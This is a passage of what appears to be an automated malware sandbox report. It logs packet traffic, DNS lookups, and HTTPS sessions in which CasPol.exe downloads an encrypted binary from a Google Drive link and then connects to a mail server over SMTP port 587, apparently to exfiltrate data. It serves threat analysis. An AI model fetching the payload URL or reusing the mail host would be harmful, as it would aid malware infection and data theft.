                                                                                May 27, 2022 13:26:33.019129992 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.019134998 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.019201040 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.019326925 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.019506931 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.019651890 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.019824982 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.019967079 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.019984961 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020045042 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020085096 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020107985 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020128012 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.020133972 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020200968 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.020206928 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020298958 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.020303011 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020481110 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.020597935 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020766973 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020793915 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.020800114 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020804882 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020848036 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020865917 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020884991 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.020889997 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020890951 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.020935059 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.020941019 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.020982027 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.021080971 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.021136045 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.021141052 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.021316051 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.021639109 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.021761894 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.021814108 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.022211075 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.022588015 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.022656918 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.022665024 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.022665977 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.022819042 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:44.860297918 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:44.874356985 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:44.874655008 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:44.919852972 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:44.920175076 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:44.934568882 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:44.934964895 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:44.950790882 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:44.954333067 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:44.975761890 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:44.975840092 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:44.975894928 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:44.975934982 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:44.976104975 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:44.976177931 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:44.977848053 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:44.977909088 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:44.978105068 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:44.981149912 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:44.995711088 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.046322107 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:45.078778028 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:45.093010902 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.094167948 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:45.108936071 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.109560013 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:45.129029036 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.129703999 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:45.144052029 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.144376993 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:45.166625977 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.167028904 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:45.181199074 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.184520960 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:45.184577942 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:45.184597015 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:45.184647083 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:26:45.198759079 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.198824883 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.198857069 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.198887110 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.201706886 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:26:45.249414921 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:28:24.743469954 CEST49764587192.168.11.20168.119.38.32
                                                                                May 27, 2022 13:28:24.797482014 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:28:24.982203960 CEST58749764168.119.38.32192.168.11.20
                                                                                May 27, 2022 13:28:24.983086109 CEST49764587192.168.11.20168.119.38.32

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                May 27, 2022 13:26:31.791882992 CEST5889953192.168.11.201.1.1.1
                                                                                May 27, 2022 13:26:31.800254107 CEST53588991.1.1.1192.168.11.20
                                                                                May 27, 2022 13:26:32.678366899 CEST5843253192.168.11.201.1.1.1
                                                                                May 27, 2022 13:26:32.717102051 CEST53584321.1.1.1192.168.11.20
                                                                                May 27, 2022 13:26:44.708852053 CEST5061253192.168.11.201.1.1.1
                                                                                May 27, 2022 13:26:44.776501894 CEST53506121.1.1.1192.168.11.20

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                May 27, 2022 13:26:31.791882992 CEST192.168.11.201.1.1.10x33a9Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                                May 27, 2022 13:26:32.678366899 CEST192.168.11.201.1.1.10xd7f4Standard query (0)doc-0g-cc-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                May 27, 2022 13:26:44.708852053 CEST192.168.11.201.1.1.10xebf7Standard query (0)mail.cortijocuevas.comA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                May 27, 2022 13:26:31.800254107 CEST1.1.1.1192.168.11.200x33a9No error (0)drive.google.com172.217.16.142A (IP address)IN (0x0001)
                                                                                May 27, 2022 13:26:32.717102051 CEST1.1.1.1192.168.11.200xd7f4No error (0)doc-0g-cc-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                May 27, 2022 13:26:32.717102051 CEST1.1.1.1192.168.11.200xd7f4No error (0)googlehosted.l.googleusercontent.com142.250.185.65A (IP address)IN (0x0001)
                                                                                May 27, 2022 13:26:44.776501894 CEST1.1.1.1192.168.11.200xebf7No error (0)mail.cortijocuevas.comcortijocuevas.comCNAME (Canonical name)IN (0x0001)
                                                                                May 27, 2022 13:26:44.776501894 CEST1.1.1.1192.168.11.200xebf7No error (0)cortijocuevas.com168.119.38.32A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • drive.google.com
                                                                                • doc-0g-cc-docs.googleusercontent.com

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.11.2049762172.217.16.142443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2022-05-27 11:26:32 UTC0OUTGET /uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Host: drive.google.com
                                                                                Cache-Control: no-cache
                                                                                2022-05-27 11:26:32 UTC0INHTTP/1.1 303 See Other
                                                                                Content-Type: application/binary
                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                Date: Fri, 27 May 2022 11:26:32 GMT
                                                                                Location: https://doc-0g-cc-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlkill7f0g8rg2nidoteuikk5gii/1653650775000/00619175272154792338/*/1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS?e=download
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                Content-Security-Policy: script-src 'nonce-1bzVz6PRAVRfXgvEO5-aSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                Server: ESF
                                                                                Content-Length: 0
                                                                                X-XSS-Protection: 0
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                X-Content-Type-Options: nosniff
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                Connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.11.2049763142.250.185.65443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2022-05-27 11:26:32 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlkill7f0g8rg2nidoteuikk5gii/1653650775000/00619175272154792338/*/1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS?e=download HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Cache-Control: no-cache
                                                                                Host: doc-0g-cc-docs.googleusercontent.com
                                                                                Connection: Keep-Alive
                                                                                2022-05-27 11:26:32 UTC1INHTTP/1.1 200 OK
                                                                                X-GUploader-UploadID: ADPycdt7PGT7SI8tQMmd7hkN_muuqMLcIXRqGLeR7EAcUSUWp-dW9DEwleL6YWCInH_OVjhQv6nWnQNVDmzOPJiybU1kxNBzDC8D
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Credentials: false
                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                Access-Control-Allow-Methods: GET,OPTIONS
                                                                                Content-Type: application/octet-stream
                                                                                Content-Disposition: attachment;filename="CHINA_yWyNfFZTW202.bin";filename*=UTF-8''CHINA_yWyNfFZTW202.bin
                                                                                Content-Length: 214592
                                                                                Date: Fri, 27 May 2022 11:26:32 GMT
                                                                                Expires: Fri, 27 May 2022 11:26:32 GMT
                                                                                Cache-Control: private, max-age=0
                                                                                X-Goog-Hash: crc32c=0UwU9w==
                                                                                Server: UploadServer
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                Connection: close
                                                                                2022-05-27 11:26:32 UTC5INData Raw: 6b da 46 8f d8 7c c2 10 1f 12 14 ae 65 99 56 99 51 b4 74 9d bd 32 02 c2 6d e8 12 08 e9 59 7d 7e ac e8 78 f2 53 fc f7 03 83 c6 d0 e9 e2 a5 74 36 88 4a 76 cb 27 f3 8c 17 bb 6f df b6 84 04 fd e9 c3 e5 04 a4 63 28 f2 88 67 bf 23 24 32 15 9a 62 cb 31 de 44 ff a8 28 86 6e f3 43 7c cf 2e 1a f0 ff aa 21 53 58 c4 78 72 0e 95 9c d9 7e a7 a8 16 87 c3 6a a3 a0 c4 c5 f7 e3 0d 87 82 f3 e2 8c 75 6b 82 c0 a6 7c 69 33 45 fc bd 23 71 1e 77 f5 02 99 f2 dd de d9 c9 27 c8 1c 78 ff 12 e8 61 80 58 cb 9d 44 93 f0 6b 6d e2 2e 0d f3 c6 ab 58 06 b5 60 21 34 81 3e 14 27 a2 cd 25 09 84 5c 03 9a 3f bf 02 cd b9 a5 b0 8c a6 11 1c b3 ec 53 bc 31 b0 8e 6d 1f 24 83 4c 1b f3 f7 ce e3 d1 2a 42 63 c2 26 4f 66 eb 63 ed 1c 51 65 a6 8f 3c d0 ad 13 af 53 2d 0f 30 75 94 a7 b1 ab a5 70 06 03 29 9a
                                                                                Data Ascii: kF|eVQt2mY}~xSt6Jv'oc(g#$2b1D(nC|.!SXxr~juk|i3E#qw'xaXDkm.X`!4>'%\?S1m$L*Bc&OfcQe<S-0up)
                                                                                2022-05-27 11:26:32 UTC9INData Raw: 42 b6 49 3c 0d 04 85 a1 ef 40 f0 23 62 d6 07 7c b5 69 b9 97 39 b8 49 72 ce 21 3f d4 e3 96 e9 5c 66 4f 25 87 6f 80 19 e9 18 69 06 09 71 d9 b5 d6 11 19 db 1d 52 b4 13 fc ec 3f c5 e5 b8 f4 07 80 51 87 0f 05 8d 61 c2 a6 a7 ab da 9b 11 a1 d3 fc f9 6e 85 84 59 c0 b2 a9 19 9d e6 70 0a 75 5c a7 c4 c7 f0 67 9f 0f cd 3f 3d 1f 42 0c 68 c8 d1 ed 5a 30 28 84 f2 bd 08 4d 52 fd 4d 79 dc 01 bd 6e 12 20 53 32 32 ad 96 97 df a4 60 22 f9 9a 62 c1 39 24 cd ee b2 2e 73 31 d4 e6 f7 b1 00 f0 2c f3 45 de c7 34 64 ed ff aa 25 f1 50 df 7a d0 06 89 e2 c4 7e a7 ac b4 8f eb 27 a3 a0 ce ed a4 e3 0d 8d aa 5d e2 8c 7f bb 9d 50 e9 60 dd 3a 88 dd 05 22 2d d3 56 a1 05 f2 81 fd d1 a9 a6 40 da 7d 15 df 6c 89 0f ef 24 8f be 26 30 d0 19 18 9f 0e 64 8c f0 e4 2f ec 95 0d 4e 50 e3 0a e7 2b 84 ee
                                                                                Data Ascii: BI<@#b|i9Ir!?\fO%oiqR?QanYpu\g?=BhZ0(MRMyn S22`"b9$.s1,E4d%Pz~']P`:"-V@}l$&0d/NP+
                                                                                2022-05-27 11:26:32 UTC13INData Raw: 0c 23 1e fc 1e d2 a8 7c d3 ce 5e 2c 72 75 7d 3b 16 a8 a9 93 9d 03 d0 a2 64 73 ef 6d 4f 7e 82 bc fe f6 89 e9 3a ef 10 dc 38 16 94 f7 4c c8 20 91 3e 77 7d 42 47 3e 3d c1 01 9b 96 a0 22 ab a2 f1 16 23 13 87 4f de 42 b0 45 3c eb 04 85 a1 d4 1d e1 25 6f e8 2a f2 02 00 cf bf 1a b2 41 69 ad 7d 3a c5 e5 87 5d 5c 66 41 25 71 6d 80 15 d2 5b 43 57 0f 1e 99 a4 dc 74 63 f9 1f 58 a1 30 a6 ea 2e c4 f8 bb fe a1 5d 3c f3 09 2d cb 70 d6 c3 25 db d8 91 3a 27 43 ea e8 70 d8 ce 5b c0 b5 ad 3e 8c f2 03 1b 01 5e a6 ad b2 d8 67 95 d5 02 59 12 24 45 82 d5 a1 b8 60 42 3a 00 21 fc b5 18 20 4a ec 48 78 7d 07 ae 6e cc 22 53 3e 9d 8d df bf 94 ae 69 47 a0 88 63 b5 30 20 dc ec 8b 66 65 20 da ca 48 c7 5c 86 2e f9 52 7a cb 38 1e 7e 48 c5 55 53 58 ce 50 d1 0e 95 96 f1 de a5 a8 10 81 eb cf
                                                                                Data Ascii: #|^,ru};dsmO~:8L >w}BG>="#OBE<%o*Ai}:]\fA%qm[CWtcX0.]<-p%:'Cp[>^gY$E`B:! JHx}n"S>iGc0 fe H\.Rz8~HUSXP
                                                                                2022-05-27 11:26:32 UTC16INData Raw: d7 8e a4 51 b3 6f b8 c0 86 e8 37 d8 31 7a 4f 78 33 7b b7 10 44 a3 5f 45 d7 ed 89 c1 6f 4a 01 5b 74 01 19 40 61 9f d6 89 a1 70 5a 59 78 fc 76 b8 a4 bb 2a 93 13 51 e4 78 ec 73 75 20 d2 9a 19 d9 26 7b 0b 3f e0 cb 24 bb 14 ed 1c ee 0a b5 d1 c8 37 4b ff 72 77 2a 1f ac c2 e9 99 15 cd 3f 3e 5b 86 6c ed 65 e9 c2 ea e0 94 d0 af 80 63 d6 3f 08 af 3d 66 6b 24 87 b5 7c 73 47 29 8e 29 d5 1c dc af a0 22 ab 97 ce 67 6d 16 bb ed 7a 42 b6 59 99 4b 04 85 aa d3 05 e4 0b f0 fe 2d 76 a1 47 75 bd 1a be 5f f5 a6 73 3f d5 fd fc e1 74 fe 4b 0d d2 45 91 1f c1 5b 67 0e 1b 36 5c b7 d6 1d 26 74 18 52 b2 3a a4 e8 2e cb f8 82 25 2d ea 55 25 18 29 d5 75 d6 84 17 db d8 91 3f 45 9d fc f3 48 af dc 63 c7 a0 a9 ff 9f e6 70 34 8c 59 a7 c2 ee cc 73 8b 21 8b 5f 15 38 56 24 b3 cc cc 66 54 bd 2f
                                                                                Data Ascii: Qo71zOx3{D_EoJ[t@apZYxv*Qxsu &{?$7Krw*?>[lec?=fk$|sG))"gmzBYK-vGu_s?tKE[g6\&tR:.%-U%)u?EHcp4Ys!_8V$fT/
                                                                                2022-05-27 11:26:32 UTC17INData Raw: 4e 1b 31 f3 37 43 b2 3b bd ff 33 de e2 be dd f2 e8 53 81 1e a0 c6 61 c2 ad 9c ca c9 8a 01 a1 43 fe f9 62 0f e6 4a d4 a0 95 1a 05 e6 76 28 15 76 78 c0 ef de 70 12 0e 13 5f 14 21 50 1d 70 d8 e4 be 40 30 2e 27 ef a7 0a 27 5b d5 d5 7d 7e 03 82 57 67 22 59 27 9c b3 9d b4 85 a8 74 00 2e 8a 63 b9 3b a9 ca ea 9a 63 60 23 cf 56 e9 80 f6 84 2e f5 e1 6d dd 39 32 0a fe aa 27 f1 49 d6 6c 66 1a bd 04 d9 7e ad 80 b1 87 c3 60 b1 ab ec 2a f7 e3 07 ab 9f 62 e9 9d 71 54 8a 6b a3 6f d9 2b 84 f5 5a 20 3d d5 7e 0f 6a f0 8b d5 09 ab a6 4a a9 78 04 cf 1e 23 0f ee 3d 85 57 d8 09 2f c7 0e 9d 1e 11 a4 e6 ef 16 79 99 1c 5e 25 dd 10 19 2b c7 b4 25 09 8e 80 70 7e 3f ef 4d de b4 c1 4b 8e a6 e0 77 2e 83 5b ad 34 98 ad 6d 1f 2e 0c a4 19 f2 f6 c2 36 dd 3b 73 4c c5 37 4a 09 b6 63 ed 16 8d
                                                                                Data Ascii: N17C;3SaCbJv(vxp_!Pp@0.''[}~Wg"Y't.c;c`#V.m92'Ilf~`*bqTko+Z =~jJx#=W/y^%+%p~?MKw.[4m.6;sL7Jc
                                                                                2022-05-27 11:26:32 UTC19INData Raw: 35 2a 22 00 dd 19 9e 8d f4 4a 24 43 43 2f f1 74 ab 35 78 35 95 55 c8 41 81 b6 63 06 af 8e 59 86 65 bb fd 96 e0 5c 0b 5b a6 b0 46 c6 a3 97 55 fa 9f 5c 0d 2f 5a 79 0f 61 20 3f 5e 6e a6 a7 68 c5 01 a5 c9 52 36 2d 84 3d 49 a6 51 a4 79 35 c7 86 e8 36 cc 36 5e 64 e0 73 7b bd 04 64 69 5d 54 c7 f1 2f dd 6f 4d 17 b6 71 3c 1f 4e 7d 13 83 9f 5f 70 d4 4a 6b e3 62 a9 ab 6d b6 bf 11 70 e1 47 27 b5 61 23 5a 3b bc 24 26 7b 00 03 bd dd 0c 25 6a df 16 fa 28 11 99 c8 31 56 1d a6 77 2a 14 95 b0 8b d4 03 da b5 44 1b 86 6d 49 60 6d e6 fe f6 87 ec b2 b1 63 dc 3c 08 07 c3 64 6b 26 bb 38 7b 60 77 2a 9a 1a c1 0b f4 18 a0 22 b0 a7 ee 16 71 02 94 37 86 43 9c 4d 0c 47 04 82 bd 39 10 dc 21 7f f5 2d 7b ad 91 ba 93 18 93 4b 53 42 0d 13 d4 e9 ec df 5c 75 7b 0f d8 e6 80 1f c1 7d 6b 06 1e
                                                                                Data Ascii: 5*"J$CC/t5x5UAcYe\[FU\/Zya ?^nhR6-=IQy566^ds{di]T/oMq<N}_pJkbmpG'a#Z;$&{%j(1Vw*DmI`mc<dk&8{`w*"q7CMG9!-{KSB\u{}k
                                                                                2022-05-27 11:26:32 UTC20INData Raw: 09 18 39 94 e7 bb 09 9a 7c 0a 03 23 85 4a dd 29 27 cc 52 ef fb b7 1f e8 c9 4e 9d 48 3d 68 34 8a c8 b7 03 c8 d9 7a 7e b2 b4 29 7a 5f e5 db 79 b3 76 86 fd 55 2d 0d d8 13 3f 7e cc 5f 51 3d c3 4a 22 79 71 98 a7 80 74 4d 0a 7f 36 20 fe a7 6a 46 81 20 ec 34 f8 aa 6b a9 2f 9f ca 17 2c ee 50 82 59 f6 d0 cb bf 5c b2 de a1 d7 50 a3 c4 86 71 7b f4 65 4c f9 3c e7 f1 d9 e1 fd 41 06 7c 23 69 4f 69 c1 6c 5c 29 66 9f 84 1d bd dd 71 64 15 23 7a 50 40 ca f2 ce 04 27 c9 b4 5d ad 73 17 fd 14 62 cf b2 a3 21 52 3a 5c e3 ef 2d 2b 06 ad 1f ae 38 eb 07 8c d2 0d cb 61 10 08 d9 d7 57 2a 1e d1 bd a0 f6 d5 0f 96 39 01 e8 cd 4d 17 93 8a 34 4c b5 34 e6 cb af 7f 8a 8a 1b 4c 00 bd eb e5 b6 29 42 4b 40 d3 9b 51 49 f4 02 fb d5 74 de 31 2e 2e 94 80 aa 41 78 bd bc 19 7a d2 e5 6c fb 38 27 d2
                                                                                Data Ascii: 9|#J)'RNH=h4z~)z_yvU-?~_Q=J"yqtM6 jF 4k/,PY\Pq{eL<A|#iOil\)fqd#zP@']sb!R:\-+8aW*9M4L4L)BK@QIt1..Axzl8'
